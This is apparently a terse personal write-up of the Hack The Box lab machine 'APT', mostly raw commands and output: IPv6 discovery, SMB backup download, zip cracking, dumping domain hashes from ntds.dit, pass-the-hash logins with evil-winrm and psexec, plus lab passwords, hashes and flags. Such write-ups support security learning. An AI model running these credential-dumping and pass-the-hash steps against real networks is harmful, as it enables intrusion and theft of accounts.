htb-apt-nl

.

i used https://github.com/puckiestyle/python/blob/master/IOXIDresolver.py

reference used :

The OXID Resolver [Part 1] – Remote enumeration of network interfaces without any authentication

┌─[root@parrot-virtual]─[/home/user/htb]
└──╼ #python3 IOXIDresolver.py -t 10.10.10.213
[*] Retrieving network interface of 10.10.10.213
Address: apt
Address: 10.10.10.213
Address: dead:beef::b885:d62a:d679:573f
Address: dead:beef::8d29:507a:2edb:a06e

 

kali@kali:/opt/evil-winrm$ ruby evil-winrm.rb -i dead:beef::b885:d62a:d679:573f -u roastsvc -p ‘!!!watermelon245’

└──╼

$nmap -6 -sV dead:beef::b885:d62a:d679:573f
Starting Nmap 7.80 ( https://nmap.org ) at 2020-12-04 14:52 GMT
Stats: 0:00:12 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 9.09% done; ETC: 14:54 (0:01:00 remaining)
Stats: 0:01:57 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 90.91% done; ETC: 14:55 (0:00:11 remaining)
Nmap scan report for dead:beef::b885:d62a:d679:573f
Host is up (0.026s latency).
Not shown: 989 filtered ports
PORT STATE SERVICE VERSION
53/tcp open domain?
80/tcp open http Microsoft IIS httpd 10.0
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2020-12-04 14:53:07Z)
135/tcp open msrpc Microsoft Windows RPC
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds (workgroup: HTB)
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.80%I=7%D=12/4%Time=5FCA4D54%P=x86_64-pc-linux-gnu%r(DNSV
SF:ersionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\
SF:x04bind\0\0\x10\0\x03");
Service Info: Host: APT; OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 149.32 seconds

.

evil-winrm -i dead:beef::b885:d62a:d679:573f -u henry.vinson_adm -p ‘G1#Ny5@2dvht’

1) get IPV6
2) smbclient connect to it and get backup.zip
3) crack zip with rockyou.txt
4) run secretsdump.py (impacket) on ntds.dlt
5) run kerbrute to find valid users
6) make a list of hashes
7) use crackmapexec -H hashes.txt

┌─[✗]─[puck@parrot-lt]─[~/htb/apt]
└──╼ $impacket-smbclient htb.local
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation
Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation

Type help for list of commands
# ls
[-] No share selected
# shares
backup
IPC$
NETLOGON
SYSVOL
# use backup
# ls
drw-rw-rw-          0  Thu Sep 24 08:31:03 2020 .
drw-rw-rw-          0  Thu Sep 24 08:31:03 2020 ..
-rw-rw-rw-   10650961  Thu Sep 24 08:31:03 2020 backup.zip
# get backup.zip
┌─[puck@parrot-lt]─[~/htb/apt]
└──╼ $impacket-lookupsid htb.local/henry.vinson_adm:G1#Ny5@2dvht@htb.local
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

[*] Brute forcing SIDs at htb.local
[*] StringBinding ncacn_np:htb.local[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-2993095098-2100462451-206186470
498: HTB\Enterprise Read-only Domain Controllers (SidTypeGroup)
500: HTB\Administrator (SidTypeUser)
501: HTB\Guest (SidTypeUser)
502: HTB\krbtgt (SidTypeUser)
503: HTB\DefaultAccount (SidTypeUser)
512: HTB\Domain Admins (SidTypeGroup)
513: HTB\Domain Users (SidTypeGroup)
514: HTB\Domain Guests (SidTypeGroup)
515: HTB\Domain Computers (SidTypeGroup)
516: HTB\Domain Controllers (SidTypeGroup)
517: HTB\Cert Publishers (SidTypeAlias)
518: HTB\Schema Admins (SidTypeGroup)
519: HTB\Enterprise Admins (SidTypeGroup)
520: HTB\Group Policy Creator Owners (SidTypeGroup)
521: HTB\Read-only Domain Controllers (SidTypeGroup)
522: HTB\Cloneable Domain Controllers (SidTypeGroup)
525: HTB\Protected Users (SidTypeGroup)
526: HTB\Key Admins (SidTypeGroup)
527: HTB\Enterprise Key Admins (SidTypeGroup)
553: HTB\RAS and IAS Servers (SidTypeAlias)
571: HTB\Allowed RODC Password Replication Group (SidTypeAlias)
572: HTB\Denied RODC Password Replication Group (SidTypeAlias)
1001: HTB\APT$ (SidTypeUser)
1102: HTB\DnsAdmins (SidTypeAlias)
1103: HTB\DnsUpdateProxy (SidTypeGroup)
1104: HTB\apt-Admins (SidTypeAlias)
1105: HTB\henry.vinson (SidTypeUser)
1106: HTB\henry.vinson_adm (SidTypeUser)
┌─[user@parrot-virtual]─[~/htb/apt]

.

┌─[user@parrot-virtual]─[~/htb/apt]
└──╼ $zip2john backup.zip > encrypted.hash$
backup.zip/Active Directory/ is not encrypted!
ver 2.0 backup.zip/Active Directory/ is not encrypted, or stored with non-handled compression type
ver 2.0 backup.zip/Active Directory/ntds.dit PKZIP Encr: cmplen=8483543, decmplen=50331648, crc=ACD0B2FB
ver 2.0 backup.zip/Active Directory/ntds.jfm PKZIP Encr: cmplen=342, decmplen=16384, crc=2A393785
ver 2.0 backup.zip/registry/ is not encrypted, or stored with non-handled compression type
ver 2.0 backup.zip/registry/SECURITY PKZIP Encr: cmplen=8522, decmplen=262144, crc=9BEBC2C3
ver 2.0 backup.zip/registry/SYSTEM PKZIP Encr: cmplen=2157644, decmplen=12582912, crc=65D9BFCD
NOTE: It is assumed that all files in each archive have the same password.
If that is not the case, the hash may be uncrackable. To avoid this, use
option -o to pick a file at a time.
┌─[user@parrot-virtual]─[~/htb/apt]
┌─[✗]─[user@parrot-virtual]─[~/htb/apt]
└──╼ $john encrypted.hash\$ --wordlist=/usr/share/wordlists/rockyou.txt 
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
iloveyousomuch (backup.zip)
1g 0:00:00:00 DONE (2021-01-26 09:37) 20.00g/s 163840p/s 163840c/s 163840C/s 123456..whitetiger
Use the "--show" option to display all of the cracked passwords reliably
Session completed
┌─[user@parrot-virtual]─[~/htb/apt]
└──╼ $python3 secretsdump.py -system SYSTEM -ntds ntds.dit LOCAL
Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation

[*] Target system bootKey: 0x936ce5da88593206567f650411e1d16b
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Searching for pekList, be patient
[*] PEK # 0 found and decrypted: 1733ad403c773dde94dddffa2292ffe9
[*] Reading and decrypting hashes from ntds.dit 
Administrator:500:aad3b435b51404eeaad3b435b51404ee:2b576acbe6bcfda7294d6bd18041b8fe:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
APT$:1000:aad3b435b51404eeaad3b435b51404ee:b300272f1cdab4469660d55fe59415cb:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:72791983d95870c0d6dd999e4389b211:::
--snip--
prue.olson:aes256-cts-hmac-sha1-96:cd0d76863148d8ad87c40bd1903a6af2295db46ce3e9494d1f8b95de99b91a64
prue.olson:aes128-cts-hmac-sha1-96:d817cf2341be47674e6d0dccab1237b0
prue.olson:des-cbc-md5:2c5dba54314c20ba
[*] ClearText password from ntds.dit 
APT$:CLEARTEXT:4[%fo'zG`&BhR3cP[)U2NVS\LEYO/&^)<9xj6%#9\\?uJ4YPb`DRK" IES2fXK"f,X(Ql*fg0RfRq=!,BeAVFt^EVRR-L)VaTjv/QG9=o;G@g>Vab-UYc Yd
[*] Cleaning up... 
┌─[user@parrot-virtual]─[~/htb/apt]

.

┌─[user@parrot-virtual]─[~/htb/apt]
└──╼ $python3 secretsdump.py -system SYSTEM -ntds ntds.dit LOCAL > result.txt
┌─[user@parrot-virtual]─[~/htb/apt]
└──╼ $cat result.txt | grep henry
henry.vinson:3647:aad3b435b51404eeaad3b435b51404ee:2de80758521541d19cabba480b260e8f:::
livy.henry:3900:aad3b435b51404eeaad3b435b51404ee:5c0f4f9540cad94bb2554c8684d9ea66:::
henry.vinson:aes256-cts-hmac-sha1-96:4c0ec4cffc953266ed72d9b565da62115655d2f402416af92e4e76d121663e2f
henry.vinson:aes128-cts-hmac-sha1-96:da63c28166768a2829f00d30ec9fbddd
henry.vinson:des-cbc-md5:80a2c83213b3dfd6
livy.henry:aes256-cts-hmac-sha1-96:8f0397da6b26addc0536c294a788b919dd980afb738e3a9c233afcfc90fba5b0
livy.henry:aes128-cts-hmac-sha1-96:b719dae2156cd496995db190411d319e
livy.henry:des-cbc-md5:1043cb0bce31c49e
┌─[user@parrot-virtual]─[~/htb/apt]

 

 

evil-winrm -i dead:beef::b885:d62a:d679:573f -u Administrator -H c370bddf384a691d811ff3495e8a72e2

 

thus

1st add ipv6 ip to etc/hosts !!!!!
dead:beef::b885:d62a:d679:573f apt.htb htb.local

2nd

┌─[user@parrot-virtual]─[/opt/evil-winrm]
└──╼ $sudo ruby evil-winrm.rb -i htb.local -u henry.vinson_adm
Enter Password:G1#Ny5@2dvh

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\henry.vinson_adm\Documents> ls


Directory: C:\Users\henry.vinson_adm\Documents


Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 1/25/2021 11:53 AM 12674 Powerless.bat


*Evil-WinRM* PS C:\Users\henry.vinson_adm\Documents> download Powerless.bat
Info: Downloading C:\Users\henry.vinson_adm\Documents\Powerless.bat to Powerless.bat


Info: Download successful!

*Evil-WinRM* PS C:\Users\henry.vinson_adm\Documents>

3th

┌─[✗]─[user@parrot-virtual]─[/opt/evil-winrm]
└──╼ $ruby evil-winrm.rb -i dead:beef::b885:d62a:d679:573f -u Administrator -H c370bddf384a691d811ff3495e8a72e2

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

Error: An error of type URI::InvalidURIError happened, message is bad URI(is not URI?): "http://dead:beef::b885:d62a:d679:573f:5985/wsman"

Error: Exiting with code 1
┌─[✗]─[user@parrot-virtual]─[/opt/evil-winrm]
└──╼ $ruby evil-winrm.rb -i htb.local -u Administrator -H c370bddf384a691d811ff3495e8a72e2

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Administrator\Documents> net users

User accounts for \\

-------------------------------------------------------------------------------
Administrator DefaultAccount Guest
henry.vinson henry.vinson_adm krbtgt
The command completed with one or more errors.


*Evil-WinRM* PS C:\Users\Administrator\Documents> dir
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ..
*Evil-WinRM* PS C:\Users\Administrator> dir

Directory: C:\Users\Administrator

Mode LastWriteTime Length Name
---- ------------- ------ ----
d-r--- 9/24/2020 9:12 AM Contacts
d-r--- 10/23/2020 10:59 AM Desktop
d-r--- 9/24/2020 9:12 AM Documents
d-r--- 9/24/2020 9:12 AM Downloads
d-r--- 9/24/2020 9:12 AM Favorites
d-r--- 9/24/2020 9:12 AM Links
d-r--- 9/24/2020 9:12 AM Music
d-r--- 9/24/2020 9:12 AM Pictures
d-r--- 9/24/2020 9:12 AM Saved Games
d-r--- 9/24/2020 9:12 AM Searches
d-r--- 9/24/2020 9:12 AM Videos

*Evil-WinRM* PS C:\Users\Administrator> cd Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> dir

Directory: C:\Users\Administrator\Desktop

Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 12/4/2020 1:22 PM 34 root.txt

*Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt
0ca97e04be5679529b87cc2a2de98782
*Evil-WinRM* PS C:\Users\Administrator\Desktop> cd ..
*Evil-WinRM* PS C:\Users\Administrator> cd ..
*Evil-WinRM* PS C:\Users\> dir
Directory: C:\Users

Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 9/24/2020 7:54 AM Administrator
d----- 9/24/2020 8:39 AM henry.vinson
d----- 9/24/2020 8:40 AM henry.vinson_adm
d-r--- 11/21/2016 2:39 AM Public

*Evil-WinRM* PS C:\Users> cd henry.vinson_adm
*Evil-WinRM* PS C:\Users\henry.vinson_adm> cd desktop
*Evil-WinRM* PS C:\Users\henry.vinson_adm\desktop> type user.txt
e1e73b8410cf060794a86e7f6a753f83
*Evil-WinRM* PS C:\Users\henry.vinson_adm\desktop>
E:\PENTEST>psexec_windows.exe -hashes c370bddf384a691d811ff3495e8a72e2:c370bddf384a691d811ff3495e8a72e2 administrator@htb.local
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation

[*] Requesting shares on apt.htb.....
[-] share 'backup' is not writable.
[*] Found writable share NETLOGON
[*] Uploading file RJdJAMfb.exe
[*] Opening SVCManager on apt.htb.....
[*] Creating service kOFV on apt.htb.....
[*] Starting service kOFV.....

.

 

Posted on

Leave a Reply

Your email address will not be published. Required fields are marked *